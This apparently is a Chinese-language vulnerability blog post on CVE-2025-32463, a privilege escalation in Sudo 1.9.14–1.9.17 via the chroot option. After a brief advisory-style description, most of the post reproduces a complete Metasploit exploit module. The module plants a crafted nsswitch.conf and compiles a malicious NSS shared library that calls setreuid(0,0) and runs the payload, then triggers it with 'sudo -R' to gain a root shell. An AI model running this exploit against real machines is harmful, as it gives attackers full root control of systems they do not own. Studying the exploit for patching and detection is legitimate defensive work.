Sudo Chroot 1917 Privilege Escalation

漏洞信息

漏洞名称： Sudo Chroot 1.9.17 Privilege Escalation

漏洞编号：

CVE： CVE-2025-32463

漏洞类型： 权限提升

漏洞等级： 高危

漏洞描述： 该漏洞影响的是Sudo，一个在Linux和Unix-like系统中广泛使用的程序，允许用户以其他用户（通常是超级用户）的安全权限运行程序。Sudo的典型部署场景包括企业级服务器、个人计算机以及任何需要权限分离的系统。由于其广泛的使用，该漏洞的影响范围较大。漏洞类型为权限提升，技术根源在于Sudo在处理chroot环境时的缺陷，使得攻击者能够绕过预期的权限限制。具体来说，漏洞存在于Sudo 1.9.14至1.9.17版本中，攻击者可以利用此漏洞在不需要认证的情况下，通过构造特定的命令序列，实现从普通用户权限提升到root权限。这种漏洞的利用可能导致攻击者完全控制系统，执行任意代码，访问敏感数据，或进行其他恶意活动。由于漏洞利用不需要用户交互，且可以自动化执行，因此其安全风险评级为高危。

产品名称： Sudo

影响版本： 1.9.14 <= version <= 1.9.17

来源： https://github.com/rapid7/metasploit-framework/blob/f6bc975d24412208f3f69237edc0b15efb645e4d/modules%2Fexploits%2Flinux%2Flocal%2Fsudo_chroot_cve_2025_32463.rb

类型： rapid7/metasploit-framework:github issues

POC详情


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Post::Linux::Compile
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
        'Description' => %q{
          This exploit module illustrates how a vulnerability could be exploited
          in an linux command for priv esc.
        },
        'License' => MSF_LICENSE,

        'Author' => [
          'msutovsky-r7', # module dev
          'Stratascale', # poc dev
          'Rich Mirch' # security research
        ],
        'Platform' => [ 'linux' ],

        'Arch' => [ ARCH_CMD ],

        # chmod has some issues for meterpreter, forcing shell
        'SessionTypes' => [ 'shell' ],

        'Targets' => [[ 'Auto', {} ]],

        'Privileged' => true,

        'References' => [
          [ 'EDB', '52352' ],
          [ 'URL', 'https://www.helpnetsecurity.com/2025/07/01/sudo-local-privilege-escalation-vulnerabilities-fixed-cve-2025-32462-cve-2025-32463/'],
          [ 'CVE', '2025-32463']
        ],
        'DisclosureDate' => '2025-06-30',

        'DefaultTarget' => 0,

        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    # force exploit is used to bypass the check command results
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),

    ]
  end

  # borrowed from exploits/linux/local/sudo_baron_samedit.rb
  def get_versions
    versions = {}
    output = cmd_exec('sudo --version')
    if output
      version = output.split("\n").first.split(' ').last
      versions[:sudo] = version if version =~ /^\d/
    end
    versions
  end

  def check
    sudo_version = get_versions[:sudo]

    return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?

    return CheckCode::Safe if !file?('/etc/nsswitch.conf')

    sudo_version.gsub!(/p/, '.')

    return CheckCode::Appears("Running version #{sudo_version}") if Rex::Version.new(sudo_version).between?(Rex::Version.new('1.9.14'), Rex::Version.new('1.9.17'))

    CheckCode::Safe('Sudo is not vulnerable')
  end

  def exploit
    # Check if we're already root
    if !datastore['ForceExploit'] && is_root?
      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
    end

    # needs to compile in real-time to adjust payload execution path
    fail_with Failure::NotFound, 'Module needs to compile payload on target machine' unless live_compile?

    payload_file = rand_text_alphanumeric(5..10)

    upload_and_chmodx("#{datastore['WritableDir']}/#{payload_file}", "#!/bin/bash\n" + payload.encoded)

    register_files_for_cleanup("#{datastore['WritableDir']}/#{payload_file}")

    temp_dir = "#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"

    base_dir = rand_text_alphanumeric(5..10)

    lib_filename = rand_text_alphanumeric(5..10)

    mkdir(temp_dir)

    cd(temp_dir)

    cmd_exec("mkdir -p #{base_dir}/etc libnss_")

    cmd_exec(%(echo "passwd: /#{lib_filename}" \> #{base_dir}/etc/nsswitch.conf))

    cmd_exec("cp /etc/group #{base_dir}/etc")

    exploit_code = %<
    #include <stdlib.h>
    #include <unistd.h>

    __attribute__((constructor))
    void exploit(void) {
      setreuid(0,0);
      setregid(0,0);
      chdir("/");
      execve("#{datastore['WritableDir']}/#{payload_file}",NULL,NULL); /* root shell */
    }>

    upload_and_compile("#{temp_dir}/libnss_/#{lib_filename}.so.2", exploit_code, "-shared -fPIC -Wl,-init,#{base_dir}")

    cmd_exec("sudo -R #{base_dir} #{base_dir}")

    timeout = 30
    print_status 'Launching exploit...'
    output = cmd_exec 'command', nil, timeout
    output.each_line { |line| vprint_status line.chomp }
  end
end

Github Poc

#rapid7/metasploit-framework:github issues #权限提升

Sudo Chroot 1917 Privilege Escalation

http://example.com/2025/07/10/github_2029770819/

作者

lianccc

发布于

2025年7月10日

许可协议

FortiWeb Unauthenticated SQL Injection Vulnerability 上一篇

Citrix NetScaler Memory Leak Vulnerability 下一篇